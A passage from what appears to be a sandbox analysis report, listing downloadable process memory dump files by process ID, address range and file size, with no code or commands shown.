148KB

Download
memory/2672-213-0x00007FF85EC70000-0x00007FF85EDEF000-memory.dmp

Filesize
1.5MB

Download
memory/2672-209-0x00007FF85FA90000-0x00007FF85FABB000-memory.dmp

Filesize
172KB

Download
memory/2672-189-0x00007FF8734E0000-0x00007FF873507000-memory.dmp

Filesize
156KB

Download
memory/2672-622-0x00007FF85C300000-0x00007FF85C833000-memory.dmp

Filesize
5.2MB

Download
memory/2672-620-0x000001FD165C0000-0x000001FD16AF3000-memory.dmp

Filesize
5.2MB

Download
memory/2672-205-0x00007FF876410000-0x00007FF87641F000-memory.dmp

Filesize
60KB

Download
memory/2672-420-0x00007FF874AF0000-0x00007FF874AFD000-memory.dmp

Filesize
52KB

Download
memory/2672-422-0x00007FF85F2C0000-0x00007FF85F2F4000-memory.dmp

Filesize
208KB

Download
memory/2672-619-0x00007FF85F1F0000-0x00007FF85F2BE000-memory.dmp

Filesize
824KB

Download
memory/2672-184-0x00007FF85CF40000-0x00007FF85D5A3000-memory.dmp

Filesize
6.4MB

Download
memory/3496-27-0x0000000000C90000-0x0000000000D04000-memory.dmp

Filesize
464KB

Download
memory/3960-87-0x0000000005550000-0x0000000005572000-memory.dmp

Filesize
136KB

Download
memory/3960-117-0x0000000007840000-0x000000000785A000-memory.dmp

Filesize
104KB

Download
memory/3960-85-0x0000000002C10000-0x0000000002C46000-memory.dmp

Filesize
216KB

Download
memory/3960-89-0x0000000005EC0000-0x0000000005F26000-memory.dmp

Filesize
408KB

Download
memory/3960-88-0x0000000005E50000-0x0000000005EB6000-memory.dmp

Filesize
408KB

Download
memory/3960-99-0x0000000005F30000-0x0000000006284000-memory.dmp

Filesize
3.3MB

Download
memory/3960-101-0x0000000006520000-0x000000000653E000-memory.dmp

Filesize
120KB

Download
memory/3960-102-0x00000000065C0000-0x000000000660C000-memory.dmp

Filesize
304KB

Download
memory/3960-103-0x0000000006AE0000-0x0000000006B12000-memory.dmp

Filesize
200KB

Download
memory/3960-122-0x0000000007A80000-0x0000000007A94000-memory.dmp

Filesize
80KB

Download
memory/3960-104-0x00000000705C0000-0x000000007060C000-memory.dmp

Filesize
304KB

Download
memory/3960-114-0x0000000006B20000-0x0000000006B3E000-memory.dmp

Filesize
120KB

Download
memory/3960-115-0x0000000007510000-0x00000000075B3000-memory.dmp

Filesize
652KB

Download
memory/3960-123-0x0000000007B80000-0x0000000007B9A000-memory.dmp

Filesize
104KB

Download
memory/3960-116-0x0000000007E80000-0x00000000084FA000-memory.dmp

Filesize
6.5MB

Download
memory/3960-86-0x00000000057B0000-0x0000000005DD8000-memory.dmp

Filesize
6.2MB

Download
memory/3960-118-0x00000000078B0000-0x00000000078BA000-memory.dmp

Filesize
40KB

Download
memory/3960-119-0x0000000007AC0000-0x0000000007B56000-memory.dmp

Filesize
600KB

Download
memory/3960-124-0x0000000007B60000-0x0000000007B68000-memory.dmp

Filesize
32KB

Download
memory/3960-121-0x0000000007A70000-0x0000000007A7E000-memory.dmp

Filesize
56KB

Download
memory/3960-120-0x0000000007A40000-0x0000000007A51000-memory.dmp

Filesize
68KB

Download
memory/3968-139-0x00000000705C0000-0x000000007060C000-memory.dmp

Filesize
304KB

Download
memory/3968-128-0x0000000005B20000-0x0000000005E74000-memory.dmp

Filesize
3.3MB

Download
memory/4088-2-0x000002BE69720000-0x000002BE69742000-memory.dmp

Filesize
136KB

Download
memory/4088-12-0x000002BE6A420000-0x000002BE6ABC6000-memory.dmp

Filesize
7.6MB

Download
memory/4844-150-0x00000000061F0000-0x0000000006794000-memory.dmp

Filesize
5.6MB

Download
memory/4844-151-0x00000000067A0000-0x0000000006832000-memory.dmp

Filesize
584KB

Download
memory/4844-152-0x00000000061B0000-0x00000000061BA000-memory.dmp

Filesize
40KB

Download
memory/4844-81-0x0000000000400000-0x0000000000418000-memory.dmp

Filesize
96KB

Download
memory/4844-346-0x00000000069F0000-0x00000000069FC000-memory.dmp

Filesize
48KB

Download
memory/4844-84-0x0000000004E70000-0x0000000004F0C000-memory.dmp

Filesize
624KB

Download
memory/4940-394-0x000001FC53BE0000-0x000001FC53BE8000-memory.dmp

Filesize
32KB

Download